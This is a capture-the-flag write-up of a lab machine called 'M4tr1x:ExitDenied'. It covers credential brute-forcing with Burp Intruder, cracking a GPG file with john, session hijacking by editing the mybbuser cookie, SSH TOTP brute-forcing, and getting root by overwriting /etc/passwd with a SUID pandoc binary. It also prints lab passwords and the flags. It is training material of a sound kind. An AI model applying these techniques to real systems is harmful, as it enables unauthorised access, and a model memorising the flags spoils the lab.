M4tr1x:ExitDenied

f79fdd51d8a5b67e8eb9e9ee00738991.png

Target IP: 10.10.235.41
Challenge Description:
e63dc3c886912d859c9741fd9236af0c.png


Reconnaissance

d92b9664932996e2a33c9ebb61cdf3b7.png
There are three TCP ports open on the target machine, as shown above. They are SSH, HTTP, and MySQL applications.

ee32cba6ad45bfdc2616285a22845c06.png
Performing an aggressive port scan against the three open TCP ports returns the result above. I will start enumeration with the HTTP application on port 80 to begin with.


Enumeration

Port 80: HTTP
558c99a89ede0085114a164fd7c01e29.png
Browsing to port 80 displays the web application above.

2ce142ef01c4e61cca7ec4d9b5120537.png
I created a test account on this website. Now I can access the threads. Now I need to find the white rabbit.

a63fba04f8863dc5dbddb857a5b47d1b.png
After looking through the different users, I find the user with the name willis interesting. The profile of this user is shown above. Maybe I can read the threads this user has participated in?

60c76cf4a119d1ceeea459647c521473.png
The user with the white rabbit profile picture has posted in the thread above. Apparently this website has a bug bounty program located at /bugbounty.

8ddc4da888d3c1e2b2293e172ed70b75.png
Browsing to /bugbounty displays the webpage above. It mentions the bug bounty report form is disabled as it is under maintenance. Maybe there is further information in the source-code of this webpage?

da65e43fcd5e1022a3fb07063f102a8b.png
And yep! All submitted requests are sent to the page /reportPanel.php as shown above.

a76ff70fc4f297ebf48d55eda646089c.png
The /reportPanel.php webpage contains a list of all submitted bugs as shown above. This is incredibly useful as some bugs could still be vulnerable if they have not been patched. From the information above, it looks like the target machine is running MyBulletinBoard. Maybe the application version is also disclosed?

74ccd27827c202e8c10feb313e62a84f.png
Out of all the bugs, I find the one above the most interesting. Apparently the web application does not use mechanisms for failed login attempts; therefore, it is possible to bruteforce the logins. This bug has been given the critical serverity level too. Maybe I can test it against the super users? The passwords are also interesting.

544b214c0dda8016f83335c5ea81fd3a.png
In total, there are eight users with super privileges. The names of these users are shown above.

1565901640c9cd7862fd25c71ccc6c23.png
On my machine, I made a file called usernames that contains the names of the moderators and the administrator as shown above. Maybe I can use the passwords that I found from the report list?

6ab37202e8ae6cffff03310b6094af48.png
I tried to bruteforce using hydra, but I had no luck. Using Burpsuite, I intercepted a login request. Then using the Intruder mode, I set the payloads for the username and password as shown above.

5e9a5fb420142f08c3b16cea83616da5.png
The attack type I used is Cluster Bomb. The first payload list contains the usernames of the administrator and moderators. The second payload list contains the passwords which I found inside the bug bounty report as shown above.

71ec08bb3150098445fc2c2f49c5e227.png
After launching the attack, I obtained two working credentials of the moderators: PalacerKing:qwerty and ArnoldBagger:Luisfactor05 as shown above. Maybe these users contain sensitive information such as private messages that I can read?

84aebd93b4568637071b372cc860eb75.png
After logging in as the moderator PalacerKing on the website, I notice this user has an unread private message about a plugin from the moderator ArnoldBagger as shown above.

6bd1dd1dc5251c14321e2e2b38ce42e0.png
The private message contains the information above. The message version 3 of the mod manager plugin for mybb sounds interesting. Maybe there is more information about this plugin under the account ArnoldBagger?

384d738ef2408507e172bb0870c6dd63.png
And bingo! More information about the plugin is shown above. I need to find the location of this plugin now.

4c358d0c3be76043db340b0a447209fc.png
I checked the different messages folders of the administrator ArnoldBagger and obtained the information above. The name /devBuilds sounds like a directory. Can I read the source-code of the plugins here?

1442a5225ff5f31583a3c0b300f2bab3.png
And browsing to /devBuilds contains the plugins shown above. The modManagerv2.plugin is the biggest in file size. This is the most interesting to me. There is also an encrypted file with the name p.txt.gpg as shown above. I downloaded the two interesting files on my machine.

c63479c2a85acfb97f92e73a613a623c.png
The source-code of the modManagerv2.plugin contains the interesting code above at line 29. The plugin reads the SQL password from the p.txt file.

0c840783a63cb9db8a0bb4f97355f623.png
This file also contains the username mod for the MySQL application, as shown above. Time to decrypt the password. The next task is to find the keymaker.

4ed393a7fe1914cb99c612ad1c9f96b3.png
The /reportPanel.php contains the message left behind by the keymaker as shown above. Is /0100101101100101011110010110110101100001011010110110010101110010 another directory?

5b7284d4d53de09fd95fd6359ef43738.png
And browsing to /0100101101100101011110010110110101100001011010110110010101110010 displays the webpage above.

43fcc87d71191a4029793f6e374dcdea.png
Viewing the source-code of this new webpage contains another hint left behind by the keymaker, as shown above. The variable chinese contains some English letters too, such as ofqxvg. The hint mentions Itertools.Permutations() is one possible solution among several.. Maybe I can generate the permutations of the English letters to crack the password hash of the MySQL?

8fa37f5031cc7fda0bf282473c531eff.png
Using an online tool, I obtained the permutation of all the English letters as shown above. I saved the result to a text file called perms on my machine. I also had to remove all the spaces in front of the possible passwords using the replace method.

92e8a7e2cb20f7bfdfe956d2199b5644.png
Then using gpg2john, I obtained the password hash of the text file p.txt.gpg. Then using john and the perms password file, I successfully cracked the password! I obtained the password fvgoxq as shown above.

512ecaa9577e0cbedb68525dbeb6e19f.png
And using the command gpg -d p.txt.gpg and entering the password fvgoxq, I obtained the password myS3CR3TPa55 of the MySQL application as shown above.

7ff7d8b526cb3d9f17d5c12d70de201a.png
And bingo! I successfully connected to the target machine's MySQL application using the credentials mod:myS3CR3TPa55, as shown above. Now I have access to the MySQL application.

06056168ca67879e24ae6cd6e0e1db4e.png
The database modManagerv2 contains one table called members. The content of this table is shown above. What is login_key?

2f318bc358592222402ed6cb11373e26.png
After some digging around, I notice the login_key is the mybbuser which can be found at cookie storage. It has a number suffix, which is the position of the user in the members table. In the previous image, the user BlackCat is in position seven. After logging in as the user PalacerKing, and changing the mybbuser to 7_JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB I gained access to the BlackCat user account.

dc339ad6eaf4df308432f73a28927d1c.png
And this user has interesting files shown above.


Exploitation

41fb41d75940c9b4be1f2c65cd050582.png
The file SSH-TOTP documentation.pdf contains the content above. Is this the SSH authentication method used by the target machine? The secret algorithm is shown above.

e56e0812d8b8890f2f6a0a8d2ce870bd.png
The file testing.png contains the content above. There is one SSH username called architect. And there are three shared secret tokens.

cb97648880e7ac23e9837063dd3a0c19.png
After getting stuck here, I downloaded a copy of the script from above to bruteforce the OTP pin for the SSH login.

eb6e13959d712d0792a1cf71077f99ed.png
Then I made the changes to the script by adding the three shared secret tokens, IP of the target machine, etc. Then I executed it. After running it, it managed to find a valid OTP password belonging to the user architect. Then I SSHed into the target machine. Now I have a foothold on the target machine via SSH as shown above.


Privilege Escalation

11129d15bce46b86b1e89b1a9b28694c.png
Running find / -perm -u=s -type f 2>/dev/null shows /usr/bin/pandoc has SUID bit set. Since I can run this binary, I can overwrite the /etc/passwd file to change the password of the user root.

df4ae8b1e1298de3b166d275fce05678.png
I copied the /etc/passwd file to the home directory of user architect. Then I generated a new password using the command openssl passwd rooted and obtained the hash 2oW4gSLBIj5rA. Then using the command pandoc passwd -t plain -o /etc/passwd, I overwrote the /etc/passwd file with the new password file. Now the user root contains the password rooted.

7aa9e53a7ae4cad034cc5bcb1a11d054.png
Now I have root privileges on the target machine now. I switched to the user root using the password rooted. But the root.txt flag is not located here.


Flags

f8fe546b6cb1b1e0c81b259325119390.png
The user.txt flag is shown above.

cddf15c91bdc3a9be008034f0ecbb06f.png
The root.txt flag is shown above. I had to use the command find / -name "*flag*" 2>/dev/null to obtain the unusual file name /etc/-- -root.py. I read the content using cat '/etc/-- -root.py' command. The real flag is Flag{R3ALw0r1D4507Ez09WExit}.

c04dce4738e95fad41d903db50a870fe.png
I ran the command find / -writable -type f 2>/dev/null and found bigpaul.txt. I know bigpaul is the username of the administrator on the web application. The content of this file is shown above. Can I use the credentials bigpaul:ilovemywifeandgirlfriend022366 at the web application? The ACP Pin arithmetic results to 718008.

5e522fc7c92b20053253a48c630b699b.png
After logging in as the administrator bigpaul, I now have access to the administrator panel shown above.

867d489e8cbefc6147334158e074f78d.png
Scrolling a little bit down after logging in at the admin panel as bigpaul, the web.txt flag is there.